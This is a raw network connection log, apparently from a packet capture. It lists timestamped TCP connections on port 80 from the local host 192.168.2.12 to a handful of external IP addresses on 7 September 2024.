                                                                                                                                                                    Sep 7, 2024 15:34:05.127212048 CEST4972480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:05.128037930 CEST8049724172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:05.128113985 CEST4972480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.083265066 CEST4972580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.089283943 CEST804972545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.089360952 CEST4972580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.089443922 CEST4972580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.089965105 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.095870972 CEST804972545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.095928907 CEST4972580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.096190929 CEST8049726172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.096262932 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.096348047 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.101037979 CEST8049726172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.611227036 CEST8049726172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.611284971 CEST8049726172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.611397982 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.611397982 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:07.816765070 CEST8049726172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:07.816839933 CEST4972680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:08.444399118 CEST4972880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:08.449446917 CEST804972864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.449522972 CEST4972880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:08.462089062 CEST4972880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:08.462786913 CEST4973080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:08.468039989 CEST804972864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.468167067 CEST4972880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:08.468666077 CEST8049730172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.468732119 CEST4973080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:08.477678061 CEST4973080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:08.482656956 CEST8049730172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.955478907 CEST8049730172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.955501080 CEST8049730172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:08.955580950 CEST4973080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:08.955662012 CEST4973080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.013550043 CEST4973380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:10.018414021 CEST804973364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.022022963 CEST4973380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:10.022119999 CEST4973380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:10.022774935 CEST4973480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.027436018 CEST804973364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.027561903 CEST8049734172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.027627945 CEST4973380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:10.027662039 CEST4973480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.027791023 CEST4973480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.032531023 CEST8049734172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.513998032 CEST8049734172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.514090061 CEST8049734172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.514158964 CEST4973480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.514195919 CEST4973480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.841502905 CEST4973680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.846273899 CEST804973645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.846338987 CEST4973680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.846406937 CEST4973680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.846885920 CEST4973780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.851392031 CEST804973645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.851448059 CEST4973680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.851671934 CEST8049737172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:10.851731062 CEST4973780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.851866961 CEST4973780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:10.856627941 CEST8049737172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.335961103 CEST8049737172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.336196899 CEST4973780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:11.336246967 CEST8049737172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.336308956 CEST4973780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:11.618779898 CEST4973880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:11.623579025 CEST804973864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.623662949 CEST4973880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:11.633908033 CEST4973880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:11.634722948 CEST4973980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:11.638813972 CEST804973864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.638923883 CEST4973880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:11.639478922 CEST8049739172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:11.639535904 CEST4973980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:11.649821043 CEST4973980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:11.654990911 CEST8049739172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.231899023 CEST8049739172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.231915951 CEST8049739172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.231925964 CEST8049739172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.231976032 CEST4973980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.232073069 CEST4973980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.488782883 CEST4974080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.493607998 CEST804974045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.493684053 CEST4974080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.508889914 CEST4974080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.509499073 CEST4974180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.515060902 CEST804974045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.515093088 CEST8049741172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:12.515122890 CEST4974080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.515170097 CEST4974180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.524724007 CEST4974180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:12.530303001 CEST8049741172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.008039951 CEST8049741172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.008064985 CEST8049741172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:13.008177996 CEST4974180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:13.008285046 CEST4974180192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.152699947 CEST4974280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:15.157624960 CEST804974264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.157751083 CEST4974280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:15.165194035 CEST4974280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:15.165821075 CEST4974380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.174093008 CEST8049743172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.174189091 CEST4974380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.174247980 CEST804974264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.174330950 CEST4974280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:15.180862904 CEST4974380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.185790062 CEST8049743172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.678893089 CEST8049743172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.678914070 CEST8049743172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.679029942 CEST4974380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.679140091 CEST4974380192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.801063061 CEST4974480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.805892944 CEST804974445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.805979967 CEST4974480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.806060076 CEST4974480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.806720972 CEST4974580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.811249971 CEST804974445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.811321020 CEST4974480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.811569929 CEST8049745172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:15.811649084 CEST4974580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.821404934 CEST4974580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:15.826374054 CEST8049745172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.324598074 CEST8049745172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.324713945 CEST8049745172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.324780941 CEST4974580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:16.324820995 CEST4974580192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:16.620400906 CEST4974680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:16.625386953 CEST804974688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.625469923 CEST4974680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:16.625564098 CEST4974680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:16.627966881 CEST4974780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:16.630723000 CEST804974688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.630769968 CEST4974680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:16.632770061 CEST8049747172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:16.632833004 CEST4974780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:16.638448954 CEST4974780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:16.643949032 CEST8049747172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.134814978 CEST8049747172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.134941101 CEST8049747172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.134951115 CEST4974780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.134985924 CEST4974780192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.407608986 CEST4974880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:17.412503958 CEST804974864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.412591934 CEST4974880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:17.415206909 CEST4974880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:17.415741920 CEST4974980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.420193911 CEST804974864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.420326948 CEST4974880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:17.420546055 CEST8049749172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.420629978 CEST4974980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.430860043 CEST4974980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.435765982 CEST8049749172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.902957916 CEST8049749172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.902977943 CEST8049749172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:17.903184891 CEST4974980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:17.903270960 CEST4974980192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.895311117 CEST4975180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.900209904 CEST804975145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.900320053 CEST4975180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.915236950 CEST4975180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.915904999 CEST4975280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.920106888 CEST804975145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.920182943 CEST4975180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.920674086 CEST8049752172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:19.920742989 CEST4975280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.920839071 CEST4975280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:19.925570965 CEST8049752172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:20.411405087 CEST8049752172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:20.411437988 CEST8049752172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:20.411593914 CEST4975280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:20.411815882 CEST4975280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:21.831821918 CEST4975380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:21.836791992 CEST804975388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.836864948 CEST4975380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:21.837002039 CEST4975380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:21.837587118 CEST4975480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:21.841844082 CEST804975388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.842289925 CEST804975388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.842336893 CEST4975380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:21.842364073 CEST8049754172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:21.842430115 CEST4975480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:21.852649927 CEST4975480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:21.857486963 CEST8049754172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.326303959 CEST8049754172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.326395988 CEST8049754172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.326447964 CEST4975480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:22.326484919 CEST4975480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:22.788075924 CEST4975580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:22.792922974 CEST804975588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.792985916 CEST4975580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:22.806106091 CEST4975580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:22.806688070 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:22.811908960 CEST804975588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.811989069 CEST4975580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:22.812329054 CEST8049756172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:22.812388897 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:22.821368933 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:22.826122046 CEST8049756172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.354423046 CEST8049756172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.354434967 CEST8049756172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.354484081 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:23.354597092 CEST8049756172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:23.354614019 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:23.354639053 CEST4975680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:24.483068943 CEST4975780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:24.487953901 CEST804975764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.488023043 CEST4975780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:24.488132954 CEST4975780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:24.488553047 CEST4975880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:24.493098021 CEST804975764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.493182898 CEST4975780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:24.493297100 CEST8049758172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.493365049 CEST4975880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:24.493515015 CEST4975880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:24.498261929 CEST8049758172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.980220079 CEST8049758172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.980402946 CEST4975880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:24.981161118 CEST8049758172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:24.981204987 CEST4975880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.315757036 CEST4975980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:27.321172953 CEST804975988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.321255922 CEST4975980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:27.321513891 CEST4975980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:27.322483063 CEST4976080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.326953888 CEST804975988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.327032089 CEST4975980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:27.327516079 CEST8049760172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.327583075 CEST4976080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.327744007 CEST4976080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.332595110 CEST8049760172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.838116884 CEST8049760172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.838146925 CEST8049760172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.838247061 CEST4976080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.838334084 CEST4976080192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.957499981 CEST4976180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.962408066 CEST804976145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.962508917 CEST4976180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.962583065 CEST4976180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.963072062 CEST4976280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.967761040 CEST804976145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.967852116 CEST4976180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.968044996 CEST8049762172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:27.968110085 CEST4976280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.968214035 CEST4976280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:27.973140955 CEST8049762172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:28.464566946 CEST8049762172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:28.464622021 CEST8049762172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:28.464689970 CEST4976280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:28.464728117 CEST4976280192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:29.530740976 CEST4976380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:29.535559893 CEST804976388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:29.535638094 CEST4976380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:29.535737038 CEST4976380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:29.536277056 CEST4976480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:29.540621042 CEST804976388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:29.540692091 CEST4976380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:34:29.541058064 CEST8049764172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:29.541115999 CEST4976480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:29.555766106 CEST4976480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:29.560591936 CEST8049764172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.031708002 CEST8049764172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.031735897 CEST8049764172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.031822920 CEST4976480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.031919956 CEST4976480192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.498066902 CEST4976580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:30.502849102 CEST804976564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.502926111 CEST4976580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:30.509047985 CEST4976580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:30.509483099 CEST4976680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.514691114 CEST8049766172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.514702082 CEST804976564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.514774084 CEST4976580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:30.514873981 CEST4976680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.514873981 CEST4976680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.519628048 CEST8049766172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.998691082 CEST8049766172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.998929024 CEST8049766172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:30.998936892 CEST4976680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:30.998980999 CEST4976680192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:31.270768881 CEST4976780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:31.275619984 CEST804976764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.275712967 CEST4976780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:31.275796890 CEST4976780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:31.276297092 CEST4976880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:31.280808926 CEST804976764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.280886889 CEST4976780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:34:31.281064034 CEST8049768172.234.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:34:31.281133890 CEST4976880192.168.2.12172.234.222.138
                                                                                                                                                                    Sep 7, 2024 15:34:31.290249109 CEST4976880192.168.2.12172.234.222.138
